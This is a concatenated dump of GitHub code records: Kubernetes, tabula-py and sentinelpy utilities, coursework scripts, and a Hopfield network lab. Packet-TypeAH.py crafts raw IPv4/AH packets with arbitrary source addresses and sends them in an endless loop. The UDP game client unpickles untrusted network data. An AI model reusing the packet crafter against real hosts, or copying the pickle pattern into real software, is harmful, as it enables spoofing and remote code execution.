re.compile('.String[P]?\\(\"([^\"]*)\",[^,]+,[^)]+\\)'),\n re.compile('.Int[P]?\\(\"([^\"]*)\",[^,]+,[^)]+\\)'),\n re.compile('.Bool[P]?\\(\"([^\"]*)\",[^,]+,[^)]+\\)'),\n re.compile('.Duration[P]?\\(\"([^\"]*)\",[^,]+,[^)]+\\)'),\n re.compile('.StringSlice[P]?\\(\"([^\"]*)\",[^,]+,[^)]+\\)') ]\n\n new_excluded_flags = set()\n # walk all the files looking for any flags being declared\n for pathname in files:\n if not pathname.endswith(\".go\"):\n continue\n f = open(pathname, 'r')\n data = f.read()\n f.close()\n matches = []\n for regex in regexs:\n matches = matches + regex.findall(data)\n for flag in matches:\n if any(x in flag for x in excluded_flags):\n continue\n if \"_\" in flag:\n new_excluded_flags.add(flag)\n if len(new_excluded_flags) != 0:\n print(\"Found a flag declared with an _ but which is not explicitly listed as a valid flag name in hack/verify-flags/excluded-flags.txt\")\n print(\"Are you certain this flag should not have been declared with an - instead?\")\n l = list(new_excluded_flags)\n l.sort()\n print((\"%s\" % \"\\n\".join(l)))\n sys.exit(1)\n\ndef main():\n rootdir = os.path.dirname(__file__) + \"/../\"\n rootdir = os.path.abspath(rootdir)\n\n if len(args.filenames) > 0:\n files = args.filenames\n else:\n files = get_all_files(rootdir)\n\n check_underscore_in_flags(rootdir, files)\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","repo_name":"kubernetes/kubernetes","sub_path":"hack/verify-flags-underscore.py","file_name":"verify-flags-underscore.py","file_ext":"py","file_size_in_byte":3874,"program_lang":"python","lang":"en","doc_type":"code","stars":103227,"dataset":"github-code","pt":"2"} +{"seq_id":"13889382378","text":"import asyncio\n\nfrom services import get_random_countdown, get_random_delay\n\n\nasync def launch_rocket(name: int, countdown: int, delay: float) -> None:\n print(f\"Launching rocket #{name}\")\n for i in reversed(range(1, countdown)):\n print(f\"{i}...\")\n await asyncio.sleep(1)\n\n print(f\"Delay for {delay}\")\n await asyncio.sleep(delay)\n\n print(\"Rocket in the space\")\n\n\ndef main():\n N = 10_000\n tasks = [\n launch_rocket(\n i,\n get_random_countdown(),\n get_random_delay(),\n )\n for i in range(1, N + 1)\n ]\n\n loop = asyncio.get_event_loop()\n loop.run_until_complete(asyncio.gather(*tasks))\n loop.close()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"DenysShevchenko/Hillel_05_2022_Work","sub_path":"lesson_11_async_threads/classwork/async.py","file_name":"async.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"28431035487","text":"'''\ndef tarolo():\n sor = [\"0 0 0\"]\n kocka = [sor, sor , sor]\n for elem in kocka:\n print(elem)\n\n\ntarolo()\n'''\ndef tarolo():\n sor = int(input(\"sor\"))\n oszlop = int(input(\"oszlop\"))\n tarolof = []\n sorszam = 0\n oszlopszam = 0\n\n for o in range(3):\n egy_sor = []\n sorszam = sorszam + 1\n oszlopszam = 0\n for z in range(3):\n oszlopszam = oszlopszam + 1\n if sor == sorszam and oszlop == oszlopszam:\n egy_sor.append(\"+\")\n else:\n egy_sor.append(\"0\")\n tarolof.append(egy_sor)\n for t in tarolof:\n print(t)\ntarolo()\n\n","repo_name":"kizsi2019/22_10D2","sub_path":"Uivárosi Gábriel/adatipus2.py","file_name":"adatipus2.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"hu","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"40274710058","text":"\"\"\"Main module.\"\"\"\nimport logging\nfrom typing import Optional\nfrom urllib.parse import urlencode\n\nimport requests\n\nfrom .exceptions import QuerySentinelProductsError\nfrom .query_sentinel_products_response import QuerySentinelProductsResponse\nfrom .request.model import SentinelProductRequest\n\n__SENTINEL_HUB_URL_PATTERN = \"https://scihub.copernicus.eu/dhus/search?{query}\"\n\n\ndef query_sentinel_hub(\n sentinel_product_request: SentinelProductRequest,\n *,\n log_level: int = logging.INFO,\n logger: Optional[logging.Logger] = None,\n) -> QuerySentinelProductsResponse:\n \"\"\"Queries the Sentinel Hub for the information in the request.\n\n Args:\n sentinel_product_request::SentinelProductRequest\n Details regarding the request\n\n log_level::int\n Level of logs to print\n\n logger::Optional[logging.Logger]\n Logger to log information and error message defaults to None\n\n Returns:\n result::QuerySentinelProductsResponse\n Result of the query\n \"\"\"\n if logger is None:\n logger = logging.getLogger(__name__)\n logger.setLevel(log_level)\n try:\n response = __call_api(sentinel_product_request, logger)\n logger.info(\n f\"Received response from Sentinel hub with status: {response.status_code}\"\n )\n return __read_response(response)\n except IOError as request_exception:\n return QuerySentinelProductsResponse(None, None, request_exception)\n\n\ndef __call_api(\n sentinel_product_request: SentinelProductRequest, logger: logging.Logger\n) -> requests.Response:\n logger.debug(f\"Querying sentinel hub with request: {sentinel_product_request}\")\n url = __build_url(sentinel_product_request)\n auth = (sentinel_product_request.username, sentinel_product_request.password)\n logger.debug(f\"Constructed url: {url}\")\n return requests.get(url, auth=auth,)\n\n\ndef __read_response(response: requests.Response) -> QuerySentinelProductsResponse:\n try:\n data = response.json()\n return QuerySentinelProductsResponse(response.status_code, data)\n except ValueError as json_error:\n return QuerySentinelProductsResponse(\n response.status_code,\n None,\n QuerySentinelProductsError(\n json_error, response.status_code, response.content.decode()\n ),\n )\n\n\ndef __build_url(sentinel_product_request: SentinelProductRequest) -> str:\n query_params = {\n \"q\": sentinel_product_request.query,\n \"start\": sentinel_product_request.start,\n \"format\": \"json\",\n }\n\n if sentinel_product_request.rows is not None:\n query_params[\"rows\"] = sentinel_product_request.rows\n\n if sentinel_product_request.order_by is not None:\n query_params[\"orderby\"] = sentinel_product_request.order_by\n\n return __SENTINEL_HUB_URL_PATTERN.format(query=urlencode(query_params))\n","repo_name":"UKHO/sentinelpy","sub_path":"sentinelpy/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2903,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"18249455431","text":"import sys\nimport socket\nimport select\nfrom pickle import dumps, loads\nfrom zlib import compress, decompress\n\nclass Client(object):\n\t\"\"\" The client class for multiplayer games.\n\tOverride the update() method for updating events, rendering, etc.\n\t\"\"\"\n\tdef __init__(self, localaddr=(socket.gethostbyname(socket.gethostname()), 8540), myport=0, buffersize=4096, protocol=0):\n\t\tself.server = localaddr\n\t\tself.client = [socket.gethostbyname(socket.gethostname()), myport]\n\t\tself.buffer = buffersize\n\t\tself.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\t\tself.protocol = protocol\n\t\t\n\t\tself.readlist = []\n\t\tself.writelist = []\n\n\t\tself.queue = []\n\n\t\tself.socket.bind(tuple(self.client))\n\t\tself.readlist.append(self.socket)\n\t\tself.connect()\n\n\tdef connect(self):\n\t\tself.send({'action' : 'connect'})\n\n\tdef pump(self):\n\t\t\"\"\" Handles all the networking stuff.\n\t\tAlways call this in the gameloop.\n\t\t\"\"\"\n\t\tr, w, e = select.select(self.readlist, self.writelist, [], 0)\n\t\tfor f in r:\n\t\t\tif f is self.socket:\n\t\t\t\tmsg = f.recv(self.buffer)\n\t\t\t\tself.queue.append(dict(loads(decompress(msg))))\n\n\t\tfor data in self.queue:\n\t\t\t[getattr(self, n)(data) for n in ('network_' + data['action'], 'network') if hasattr(self, n)]\n\t\t\tself.queue.remove(data)\n\n\tdef update(self, *args):\n\t\t\"\"\" Handle non-networking updates.\n\t\tThe following statement,\n\n\t\tself.send({'action' : 'update'})\n\n\t\tmust always be called by the function\n\t\teven when overriden.\n\t\t\"\"\"\n\t\tself.send({'action' : 'update'})\n\n\tdef send(self, data, debug=False):\n\t\t\"\"\" Send data to the server.\n\t\t\"\"\"\n\t\tdata.update({'client' : self.socket.getsockname(), 'protocol' : self.protocol})\n\t\tz = zip(data.keys(), data.values())\n\t\td = compress(dumps(z))\n\t\tif debug:\n\t\t\tprint(sys.getsizeof(d))\n\t\t\t\n\t\tself.socket.sendto(d, self.server)\n\n\tdef close(self):\n\t\t\"\"\" Call this when the user wants\n\t\tto disconnect from the server.\n\t\t\"\"\"\n\t\tself.send({'action' : 'disconnect'})\n\t\tself.socket.close()\n\n\tdef network_serverClose(self, data):\n\t\tself.close()\n\n\nif __name__ == '__main__':\n\tclass TestClient(Client):\n\t\tdef __init__(self):\n\t\t\tClient.__init__(self)\n\n\t\tdef network_imfat(self, data):\n\t\t\tprint(data['msg'])\n\n\n\tc = TestClient()\n\twhile True:\n\t\tc.pump()\n\t\tc.update()","repo_name":"SirBob01/Centurion-Human-Evolution","sub_path":"data/sys/pie/net/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2206,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"8597111260","text":"import re\n\nclass Solution:\n def isNumber(self, s: str) -> bool:\n # this works, but it would be nice to be able to solve this in only 1 loop. My solution iterates it several times\n # an example of 1 loop using DFA: https://leetcode.com/problems/valid-number/discuss/23728/A-simple-solution-in-Python-based-on-DFA\n # a clever example of 1 loop by using booleans for states (without a DFA): https://leetcode.com/problems/valid-number/discuss/173977/Python-with-simple-explanation\n espies = re.split(\"[eE]\", s)\n # print(\"espies\", s, espies)\n if len(espies) > 2: return False\n elif len(espies) == 2:\n # print(\"espies\", isDecimal(espies[0]), isSignedInteger(espies[1]))\n return isDecimal(espies[0]) and isSignedInteger(espies[1])\n return isDecimal(s)\n\ndigits = \"0123456789\"\nsigns = \"-+\"\ndigitsigns = digits + signs\ndef isInteger(s): return s != \"\" and all(l in digits for l in s)\ndef isSignedInteger(s):\n return len(s) > 0 and s[0] in signs and isInteger(s[1:]) or isInteger(s)\n\ndef isDecimal(s):\n if not s: return False\n\n digitcount = 0\n decimalcount = 0\n for i, l in enumerate(s):\n if l in signs:\n if i != 0 or i == len(s) - 1: return False\n elif l == \".\":\n if i == 0 and i == len(s) - 1: return False\n decimalcount += 1\n elif l not in digits: return False\n else:\n digitcount += 1\n return decimalcount <= 1 and digitcount > 0\n\n# def isIntegerE(s):\n# if not s: return False\n# ecount = 0\n# for i, l in enumerate(s):\n# if l in signs:\n# if i != 0 or i == len(s) - 1: return False\n# elif l in \"eE\":\n# if i == 0 or i == len(s) - 1: return False\n# ecount += 1\n# elif l not in digits: return False\n# return ecount <= 1\n\ns = Solution()\n\nfor value in [\"2\", \"0089\", \"-0.1\", \"+3.14\", \"4.\", \"-.9\", \"2e10\", \"-90E3\", \"3e+7\", \"+6e-1\", \"53.5e93\", \"-123.456e789\"]:\n assert s.isNumber(value) == True\n\nfor value in [\"\", \"abc\", \"1a\", \"1e\", \"e3\", \"99e2.5\", \"--6\", \"-+3\", \"95a54e53\", \".\", \"4e+\", \"+.\"]:\n assert s.isNumber(value) == False","repo_name":"shurane/problems","sub_path":"leetcode-clackamas/valid-number.py","file_name":"valid-number.py","file_ext":"py","file_size_in_byte":2164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"24199813263","text":"import logging\n\nloggers ={}\n\ndef getLogger(name):\n global loggers\n\n if loggers.get(name):\n return loggers.get(name)\n else:\n logger = logging.getLogger(name)\n if not logger.handlers:\n handler = logging.StreamHandler()\n formatter = logging.Formatter('%(asctime)s [%(name)-12s] %(levelname)-8s %(message)s')\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n logger.setLevel(logging.DEBUG)\n logger.propagate = False\n loggers[name] = logger\n return logger","repo_name":"Birkenpapier/informaticup21","sub_path":"miscellaneous/infomaterial/create_state/pylogging.py","file_name":"pylogging.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"23503738279","text":"\"\"\"\nUtility module providing some convenient functions.\n\"\"\"\n\nfrom __future__ import annotations\n\nimport os\nimport platform\nimport shlex\nfrom dataclasses import dataclass\nfrom logging import getLogger\nfrom typing import IO, Iterable, List, Optional, Union, cast\n\nlogger = getLogger(__name__)\n\nFileLikeObj = Union[IO, str, os.PathLike]\n\n\ndef java_version() -> str:\n \"\"\"Show Java version\n\n Returns:\n str: Result of ``java -version``\n \"\"\"\n import subprocess\n\n try:\n res = subprocess.check_output(\n [\"java\", \"-version\"], stderr=subprocess.STDOUT\n ).decode()\n\n except FileNotFoundError:\n res = (\n \"`java -version` faild. `java` command is not found from this Python\"\n \"process. Please ensure Java is installed and PATH is set for `java`\"\n )\n\n return res\n\n\ndef environment_info() -> None:\n \"\"\"Show environment information for reporting.\n\n Returns:\n str:\n Detailed information like Python version, Java version,\n or OS environment, etc.\n \"\"\"\n\n import sys\n\n import distro\n\n from tabula import __version__\n\n print(\n f\"\"\"Python version:\n {sys.version}\nJava version:\n {java_version().strip()}\ntabula-py version: {__version__}\nplatform: {platform.platform()}\nuname:\n {str(platform.uname())}\nlinux_distribution: ('{distro.name()}', '{distro.version()}', '{distro.codename()}')\nmac_ver: {platform.mac_ver()}\"\"\"\n )\n\n\n@dataclass\nclass TabulaOption:\n \"\"\"Build options for tabula-java\n\n Args:\n pages (str, int, `iterable` of `int`, optional):\n An optional values specifying pages to extract from. It allows\n `str`,`int`, `iterable` of :`int`. Default: `1`\n\n Examples:\n ``'1-2,3'``, ``'all'``, ``[1,2]``\n guess (bool, optional):\n Guess the portion of the page to analyze per page. Default `True`\n If you use \"area\" option, this option becomes `False`.\n\n Note:\n As of tabula-java 1.0.3, guess option becomes independent from\n lattice and stream option, you can use guess and lattice/stream option\n at the same time.\n\n area (iterable of float, iterable of iterable of float, optional):\n Portion of the page to analyze(top,left,bottom,right).\n Default is entire page.\n\n Note:\n If you want to use multiple area options and extract in one table, it\n should be better to set ``multiple_tables=False`` for :func:`read_pdf()`\n\n Examples:\n ``[269.875,12.75,790.5,561]``,\n ``[[12.1,20.5,30.1,50.2], [1.0,3.2,10.5,40.2]]``\n\n relative_area (bool, optional):\n If all area values are between 0-100 (inclusive) and preceded by ``'%'``,\n input will be taken as % of actual height or width of the page.\n Default ``False``.\n lattice (bool, optional):\n Force PDF to be extracted using lattice-mode extraction\n (if there are ruling lines separating each cell, as in a PDF of an\n Excel spreadsheet)\n stream (bool, optional):\n Force PDF to be extracted using stream-mode extraction\n (if there are no ruling lines separating each cell, as in a PDF of an\n Excel spreadsheet)\n password (str, optional):\n Password to decrypt document. Default: empty\n silent (bool, optional):\n Suppress all stderr output.\n columns (iterable, optional):\n X coordinates of column boundaries.\n\n Example:\n ``[10.1, 20.2, 30.3]``\n relative_columns (bool, optional):\n If all values are between 0-100 (inclusive) and preceded by '%',\n input will be taken as % of actual width of the page.\n Default ``False``.\n format (str, optional):\n Format for output file or extracted object.\n (``\"CSV\"``, ``\"TSV\"``, ``\"JSON\"``)\n batch (str, optional):\n Convert all PDF files in the provided directory. This argument should be\n directory path.\n output_path (str, optional):\n Output file path. File format of it is depends on ``format``.\n Same as ``--outfile`` option of tabula-java.\n options (str, optional):\n Raw option string for tabula-java.\n multiple_tables (bool, optional):\n Extract multiple tables into a dataframe. Default: True\n \"\"\"\n\n pages: Optional[Union[str, int, Iterable[int]]] = None\n guess: bool = True\n area: Optional[Union[Iterable[float], Iterable[Iterable[float]]]] = None\n relative_area: bool = False\n lattice: bool = False\n stream: bool = False\n password: Optional[str] = None\n silent: Optional[bool] = None\n columns: Optional[Iterable[float]] = None\n relative_columns: bool = False\n format: Optional[str] = None\n batch: Optional[str] = None\n output_path: Optional[str] = None\n options: Optional[str] = \"\"\n multiple_tables: bool = True\n\n def merge(self, other: TabulaOption) -> TabulaOption:\n \"\"\"Merge two TabulaOption.\n self will overwrite other fields' values.\n \"\"\"\n return TabulaOption(\n pages=self.pages or other.pages,\n guess=self.guess or other.guess,\n area=self.area or other.area,\n relative_area=self.relative_area or other.relative_area,\n lattice=self.lattice or other.lattice,\n stream=self.stream or other.stream,\n password=self.password or other.password,\n silent=self.silent or other.silent,\n columns=self.columns or other.columns,\n relative_columns=self.relative_columns or other.relative_columns,\n format=self.format or other.format,\n batch=self.batch or other.batch,\n output_path=self.output_path or other.output_path,\n options=self.options or other.options,\n multiple_tables=self.multiple_tables or other.multiple_tables,\n )\n\n def build_option_list(self) -> List[str]:\n \"\"\"Convert to tabula-java option list\"\"\"\n __options = []\n # handle options described in string for backward compatibility\n if self.options:\n __options += shlex.split(self.options)\n\n if self.pages:\n __pages = self.pages\n if isinstance(self.pages, int):\n __pages = str(self.pages)\n elif type(self.pages) in [list, tuple]:\n __pages = \",\".join(map(str, self.pages))\n\n __pages = cast(str, __pages)\n __options += [\"--pages\", __pages]\n else:\n logger.warning(\n \"'pages' argument isn't specified.\"\n \"Will extract only from page 1 by default.\"\n )\n\n multiple_areas = False\n\n if self.area:\n self.guess = False\n if type(self.area) in [list, tuple]:\n # Check if nested list or tuple for multiple areas\n if any(type(e) in [list, tuple] for e in self.area):\n for e in self.area:\n e = cast(Iterable[float], e)\n _validate_area(e)\n __area = _format_with_relative(e, self.relative_area)\n __options += [\"--area\", __area]\n multiple_areas = True\n\n else:\n area = cast(Iterable[float], self.area)\n _validate_area(area)\n __area = _format_with_relative(area, self.relative_area)\n __options += [\"--area\", __area]\n\n if self.lattice:\n __options.append(\"--lattice\")\n\n if self.stream:\n __options.append(\"--stream\")\n\n if self.guess and not multiple_areas:\n __options.append(\"--guess\")\n\n if self.format:\n __options += [\"--format\", self.format]\n\n if self.output_path:\n __options += [\"--outfile\", self.output_path]\n\n if self.columns:\n if self.columns != sorted(self.columns):\n raise ValueError(\"columns option should be sorted\")\n\n __columns = _format_with_relative(self.columns, self.relative_columns)\n __options += [\"--columns\", __columns]\n\n if self.password:\n __options += [\"--password\", self.password]\n\n if self.batch:\n __options += [\"--batch\", self.batch]\n\n if self.silent:\n __options.append(\"--silent\")\n\n return __options\n\n\ndef _format_with_relative(values: Iterable[float], is_relative: bool) -> str:\n percent = \"%\" if is_relative else \"\"\n value_str = \",\".join(map(str, values))\n\n return f\"{percent}{value_str}\"\n\n\ndef _validate_area(values: Iterable[float]) -> None:\n value_length = len(list(values))\n if value_length != 4:\n raise ValueError(\n f\"area should have 4 values for each option but {values} has {value_length}\"\n )\n top, left, bottom, right = values\n if top >= bottom:\n raise ValueError(\n f\"area option bottom={bottom} should be greater than top={top}\"\n )\n if left >= right:\n raise ValueError(\n f\"area option right={right} should be greater than left={left}\"\n )\n","repo_name":"chezou/tabula-py","sub_path":"tabula/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":9383,"program_lang":"python","lang":"en","doc_type":"code","stars":1955,"dataset":"github-code","pt":"2"} +{"seq_id":"23787452575","text":"#!/usr/bin/env python3\nimport socket\nimport struct\nimport time\n\nclass the_oipv4_header:\n def __init__(self, src_address, dst_address):\n self.src_address = src_address\n self.dst_address = dst_address\n self.new_ipv4_header = None\n\n def create_oipv4_packet(self):\n ip_ver = 4 \n ip_ihl = 5 \n self.ip_ver = (ip_ver << 4) + ip_ihl \n\n ip_dsc = 0\n ip_enc = 0\n self.ip_tos = (ip_dsc << 2) + ip_enc \n\n self.ip_tolen = 0 \n\n self.ip_id = 54321 \n\n ip_default = 0 \n ip_dontfrag = 0 \n ip_morefrag = 0 \n ip_fragoff = 0 \n self.ip_flg = (ip_default << 7) + (ip_dontfrag << 6) + (ip_morefrag << 5) + (ip_fragoff) \n\n self.ip_ttl = 255 \n\n self.ip_proto = 51 \t\t#6 = tcp, 17 = udp, 41 = ipv6, 50 = ipsec esp, 51 = ipsec ah\n\n self.ip_chksm = 0 \n\n self.ip_src = socket.inet_aton(self.src_address) \n self.ip_dst = socket.inet_aton(self.dst_address) \n\n\n self.new_ipv4_header = struct.pack('!BBHHHBBH4s4s', \n self.ip_ver, self.ip_tos, self.ip_tolen, self.ip_id, self.ip_flg, self.ip_ttl, \\\n self.ip_proto, self.ip_chksm, self.ip_src, self.ip_dst) \n\n return self.new_ipv4_header\n\nclass the_iipv4_header:\n def __init__(self, src_address, dst_address):\n self.src_address = src_address\n self.dst_address = dst_address\n self.new_ipv4_header = None\n\n def create_iipv4_packet(self):\n ip_ver = 4 \n ip_ihl = 5 \n self.ip_ver = (ip_ver << 4) + ip_ihl \n\n ip_dsc = 0\n ip_enc = 0\n self.ip_tos = (ip_dsc << 2) + ip_enc \n\n self.ip_tolen = 0 \n\n self.ip_id = 54321 \n\n ip_default = 0 \n ip_dontfrag = 0 \n ip_morefrag = 0 \n ip_fragoff = 0 \n self.ip_flg = (ip_default << 7) + (ip_dontfrag << 6) + (ip_morefrag << 5) + (ip_fragoff) \n\n self.ip_ttl = 255 \n\n self.ip_proto = 1 \t#1 = icmp, 6 = tcp, 17 = udp, 41 = ipv6, 50 = ipsec esp, 51 = ipsec ah\n\n self.ip_chksm = 0 \n\n self.ip_src = socket.inet_aton(self.src_address) \n self.ip_dst = socket.inet_aton(self.dst_address) \n\n\n self.new_ipv4_header = struct.pack('!BBHHHBBH4s4s', \n self.ip_ver, self.ip_tos, self.ip_tolen, self.ip_id, self.ip_flg, self.ip_ttl, \\\n self.ip_proto, self.ip_chksm, self.ip_src, self.ip_dst) \n\n return self.new_ipv4_header\n\nclass the_ah_header:\n\n def __init__(self):\n self.new_ah_header = None\n self.create_ah_header()\n\n def create_ah_header(self):\n self.ah_nxthdr = 4 #in tunnel mode | 4 = 1pv4, 41 = ipv6\n self.ah_plen = 4\n self.ah_rserv = 0000\n self.ah_spi = 0x00000000\n self.ah_seqno = 1\n self.au_icv = b'0'\n\n self.new_ah_header = struct.pack('!bbhII12s', self.ah_nxthdr, self.ah_plen, self.ah_rserv, \\\n \t\t\t\t\t\t\t\t\t\t\t\tself.ah_spi, self.ah_seqno, self.au_icv)\n return self.new_ah_header\n\nclass the_icmp_header:\n def __init__(self):\n self.new_icmp_header = None\n\n def create_icmp_header(self):\n self.icm_type = 8\n self.icm_code = 0\n self.icm_chksm = 0xf7fd\n self.icm_id = 1\n self.icm_seq = 1\n\n self.new_icmp_header = struct.pack('!bbHHh',\n self.icm_type, self.icm_code, self.icm_chksm, self.icm_id, self.icm_seq)\n\nconnection = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)\nconnection.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\nconnection.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)\n\nwhile True:\n\tget_oipv4_address = the_oipv4_header('100.100.100.101','100.100.100.100') \n\tget_oipv4_address.create_oipv4_packet() \n\tipv4_packet_01 = get_oipv4_address.new_ipv4_header\n\n\tget_ah_header = the_ah_header()\n\tah_header_01 = get_ah_header.new_ah_header\n\t'''print (len(ah_header_01))'''\n\n\tget_iipv4_address = the_iipv4_header('100.100.100.101','100.100.100.100') \n\tget_iipv4_address.create_iipv4_packet() \n\tipv4_packet_02 = get_iipv4_address.new_ipv4_header\n\n\tget_icmp_header = the_icmp_header()\n\tget_icmp_header.create_icmp_header()\n\ticmp_segment_01 = get_icmp_header.new_icmp_header\n #must change addresses to appropriate ip address\n\tconnection.sendto(ipv4_packet_01 + ah_header_01 + ipv4_packet_02 + icmp_segment_01 ,(('127.0.0.1',0)))\n\tprint('SENT')\n\ttime.sleep(1)","repo_name":"madawaladw/DW-Python3Scripts","sub_path":"Customized Packets/Packet-TypeAH.py","file_name":"Packet-TypeAH.py","file_ext":"py","file_size_in_byte":4404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"6829504183","text":"# Import libraries\r\nimport numpy as np\r\nimport itertools\r\nimport load_data as ld\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\n\r\n\"\"\"\r\nThis lab is addressed to:\r\n- Explain the principles underlying the operation and functionality of au-\r\ntoassociative networks;\r\n- Train the Hopfield network;\r\n- Explain the attractor dynamics of Hopfield networks the concept of energy\r\nfunction;\r\n- Demonstrate how autoassociative networks can do pattern completion and\r\nnoise reduction;\r\n- Investgate the question of storage capacity and explain features that help\r\nincrease it in associative memories.\r\n\"\"\"\r\n\r\ndef fit(training, method = 'self_connection'):\r\n M = training.shape[1]\r\n weights = np.zeros((M,M))\r\n N = training.shape[0]\r\n for i in range(M):\r\n for j in range(M):\r\n if method == 'self_connection':\r\n weights[i, j] = 1/M * np.dot(training[:,i],training[:,j])\r\n else:\r\n if i == j:\r\n weights[i, j] = 0\r\n else:\r\n weights[i, j] = 1/M * np.dot(training[:,i],training[:,j])\r\n\r\n return weights\r\n\r\ndef sparse_fit(training,method='self_connection'):\r\n M = training.shape[1]\r\n weights = np.zeros((M, M))\r\n N = training.shape[0]\r\n rho = training.mean()\r\n #print('rho',rho)\r\n for i in range(M):\r\n for j in range(M):\r\n if method == 'self_connection':\r\n weights[i, j] = np.dot(training[:, i]-rho, training[:, j]-rho)\r\n else:\r\n if i == j:\r\n weights[i, j] = 0\r\n else:\r\n weights[i, j] = np.dot(training[:, i]-rho, training[:, j]-rho)\r\n #print('weights', weights.mean())\r\n #print('training size ', N)\r\n #print('max weight ', np.max(weights))\r\n return weights\r\n\r\ndef sparse_activation(x,bias,weight_row):\r\n print(\"activation magnitude \",np.dot(weight_row,x))\r\n return 0.5 + 0.5*sign(np.dot(weight_row,x)-bias)\r\n\r\n\r\ndef sparse_predict(weights,bias,test_original,max_iterations=100):\r\n M = weights.shape[0]\r\n previous_test = np.zeros((1, M))\r\n counter = 0\r\n np.random.seed(42)\r\n test = test_original.copy()\r\n while(counter=0:\r\n return 1\r\n else:\r\n return -1\r\n\r\n\r\ndef sign_vec(x):\r\n for i in range(x.shape[0]):\r\n if (x[i]>=0):\r\n x[i]=1\r\n else:\r\n x[i]=-1\r\n return x\r\n\r\ndef predict_little_model(weights,test_original,max_iterations=100):\r\n M = weights.shape[0]\r\n previous_test = np.zeros((1, M))\r\n counter = 0\r\n np.random.seed(42)\r\n test = test_original.copy()\r\n\r\n while (counter < max_iterations):\r\n previous_test = test.copy()\r\n # update_index = np.random.randint(M)\r\n # updated_bit = sign(np.dot(weights[update_index],test))\r\n test = sign_vec(np.dot(weights,previous_test))\r\n if (np.array_equal(previous_test, test)):\r\n break\r\n counter += 1\r\n # print(\"Total number of iterations \",counter)\r\n return test\r\n\r\n\r\ndef predict(weights,test_original,max_iterations=200,energy = False):\r\n M = weights.shape[0]\r\n previous_test = np.zeros((1,M))\r\n counter=0\r\n np.random.seed(42)\r\n test = test_original.copy()\r\n if (not energy):\r\n while(counter0):\r\n print(noise_magnitude)\r\n flipped_indeces = np.random.choice(M, noise_magnitude, replace=False)\r\n training_noise[flipped_indeces] = -training_noise[flipped_indeces]\r\n output = predict_little_model(weights,training_noise)\r\n accuracy[per,it,k,j] = compute_accuracy(train,output)\r\n print('accuracies ', accuracy[per,it,k])\r\n\r\n print(accuracy)\r\n\r\n accuracy_mean = accuracy.mean(axis=1)\r\n return accuracy_mean\r\n\r\ndef three_point_six(activity=10,bias_low=0,bias_high=6,bias_step=0.5):\r\n number_of_random_samples = 300\r\n training = np.zeros((number_of_random_samples, 100))\r\n\r\n\r\n\r\n skeleton = np.zeros(100)\r\n skeleton[:activity] = 1\r\n np.random.seed(42)\r\n if(activity==1):\r\n training = np.zeros((100, 100))\r\n number_of_random_samples=100\r\n for i in range(100):\r\n training[i][i]=1\r\n else:\r\n for i in range(training.shape[0]):\r\n training[i] = np.random.permutation(skeleton)\r\n print(\"Unique samples \", np.unique(training,axis=0).shape[0])\r\n print('training size', training.shape)\r\n bias_range = np.arange(bias_low, bias_high, bias_step)\r\n\r\n capacity_size = np.zeros(bias_range.shape[0])\r\n count=0\r\n for bias in bias_range:\r\n stable_patterns = np.zeros(number_of_random_samples)\r\n\r\n for i in range(number_of_random_samples-1):\r\n examined_training = training[:i + 1].copy()\r\n\r\n weights = sparse_fit(examined_training, method='self_connection')\r\n stable_points = 0\r\n for j in range(examined_training.shape[0]):\r\n output = sparse_predict(weights, bias, examined_training[j], max_iterations=100)\r\n # print('outputs ratio',output[output==1].shape[0]/output.shape[0])\r\n if (np.array_equal(examined_training[j], output)):\r\n stable_points += 1\r\n stable_patterns[i] = stable_points / examined_training.shape[0]\r\n if (stable_patterns[i]<1):\r\n break\r\n\r\n\r\n print(stable_patterns)\r\n capacity_size[count] = measure_capacity(stable_patterns)\r\n print('capacity size',capacity_size[count])\r\n '''\r\n plt.plot(np.arange(1, 301, 1), stable_patterns, label='Stable Points %')\r\n plt.vlines(13.8, 0, 1, linestyles='dashed', label='0.138*N')\r\n plt.legend()\r\n plt.title('Stable Pattern Percentage as a function of the training size')\r\n plt.xlabel('Number of Training Patterns')\r\n plt.ylabel('Stable Pattern Percentage')\r\n\r\n plt.show()\r\n '''\r\n count+=1\r\n plt.plot(bias_range, capacity_size, label = 'Capacity Size')\r\n position = bias_low + np.argmax(capacity_size)*bias_step\r\n plt.vlines(position,0,np.max(capacity_size),linestyles='dashed',label='At '+str(round(position,1)))\r\n plt.title(\"Capacity size as a function of the bias\")\r\n plt.xlabel(\"Bias\")\r\n plt.ylabel(\"Capacity Size\")\r\n plt.legend()\r\n plt.show()\r\n\r\n\r\ndef measure_capacity(stable_patterns):\r\n counter=0\r\n for num in stable_patterns:\r\n if (num==1):\r\n counter+=1\r\n else:\r\n break\r\n return counter","repo_name":"ddnimara/KTH_Projects","sub_path":"Artificial Neural Networks/DD2437_Artificial_Neural_Network_Lab_3/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":17392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"69812716526","text":"import pysidocast\nimport pygame\nfrom math import *\n\npygame.init()\n\nscene = pysidocast.Scene() # INIT THE SCENE\n\nPERF = 0.32 